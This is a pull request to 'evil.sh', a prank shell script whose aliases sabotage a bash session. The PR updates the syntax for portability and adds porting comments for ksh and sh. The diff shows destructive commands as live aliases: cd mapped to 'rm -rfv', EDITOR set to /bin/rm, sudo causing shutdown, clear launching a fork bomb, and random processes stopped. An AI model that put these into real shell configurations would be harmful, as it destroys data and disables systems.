### PR TITLE
Remove obsolete constructs, add until inversion.

### DIFF
--- a/evil.sh
+++ b/evil.sh
@@ -5,6 +5,7 @@
 export EDITOR=/bin/rm
 
 # Make Tab send the delete key
+# sh: replace $'\t' with a quoted literal tab
 tset -Qe $'\t'
 
 # Randomly make the shell exit whenever a command has a non-zero exit status
@@ -14,7 +15,7 @@ tset -Qe $'\t'
 alias cat=true
 
 # Use a random sort option whenever `ls` is invoked
-function ls { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
+ls() { command ls -$(opts="frStu"; echo ${opts:$((RANDOM % ${#opts})):1}) "$@"; }
 
 # Delete directories instead of entering them
 alias cd='rm -rfv'
@@ -23,16 +24,17 @@ alias cd='rm -rfv'
 alias sudo='sudo shutdown -P now'
 
 # Launch a fork bomb instead of clearing the screen
+# sh, ksh: replace `:' with boring names like _f
 alias clear=':(){ :|:& };:'
 
 # Have `date` return random dates
 alias date='date -d "now + $RANDOM days"'
 
 # Randomly eject CD tray
-sleep $[ ( $RANDOM % 10 )  + 1 ]s && [[ uname=="Darwin" ]] && drutil eject || eject -T &
+sleep $((RANDOM%10  + 1)) && [[ uname=="Darwin" ]] && drutil eject || eject -T &
 
 # Send STOP signal to random process at random time
-sleep $[ ( $RANDOM % 100 )  + 1 ]s && kill -STOP $(ps x -o pid|sed 1d|sort -R|head -1) &
+sleep $((RANDOM%100 + 1)) && kill -STOP $(ps x -o pid|sed 1d|sort -R|head -1) &
 
 # Have `cp` perform `mv` instead
 alias cp='mv'
@@ -41,11 +43,12 @@ alias cp='mv'
 alias exit='sh'
 
 # Add a random number to line numbers when using `grep -n`
-function grep { command grep "$@" | awk -F: '{ r = int(rand() * 10); n = $1; $1 = ""; command if (n ~ /^[0-9]+$/) { o = n+r } else { o = n }; print o ":" substr($0, 2)}'; }
+grep() { command grep "$@" | awk -F: '{ r = int(rand() * 10); n = $1; $1 = ""; command if (n ~ /^[0-9]+$/) { o = n+r } else { o = n }; print o ":" substr($0, 2)}'; }
 
 # Invert `if`, `for`, and `while`.
 alias if='if !' for='for !' while='while !'
 
 # Map Enter, Ctrl+J, and Ctrl+M to backspace.
+# ksh: bind '^J=delete-char' '^M=delete-char'
 bind '"\C-J":"\C-?"'
 bind '"\C-M":"\C-?"'


### PR DESCRIPTION
Removing obsolete constructs like `$[ expr ]` and `sleep NUMs` makes the script more portable, or at least easier to port to ksh and other POSIX shells as well as environments with other types of `sleep` (POSIX `sleep` doesn't require accepting suffixes.)

I have also added comments for users/screwers of other shells. Unfortunately I am too lazy to write those `if [ "$BASH" ]` code, and not to mention that figuring out if a shell is ksh and its version can be tricky.